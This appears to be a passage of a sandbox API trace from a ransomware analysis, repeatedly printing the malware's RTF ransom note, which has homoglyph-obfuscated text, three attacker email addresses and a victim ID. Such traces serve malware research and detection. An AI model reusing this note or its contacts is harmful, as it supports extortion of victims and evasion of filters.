lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.071] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 